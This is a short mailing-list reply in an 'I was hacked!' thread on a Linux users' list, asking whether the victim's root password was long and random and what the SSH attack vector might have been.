[ale] I was hacked!

Dow Hurst dphurst at uncg.edu
Mon Nov 4 12:11:55 EST 2019

Just curious, did you have a really good password on root? Like more than
16 random characters? I would expect you would, but am curious about what
you think is the attack vector. Root access via a password through ssh
would still be tough if the password is long enough and completely random.
Sincerely,
Dow
⚛Dow Hurst, Research Scientist
       340 Sullivan Science Bldg.
       Dept. of Chem. and Biochem.
       University of North Carolina at Greensboro
       PO Box 26170 Greensboro, NC 27402-6170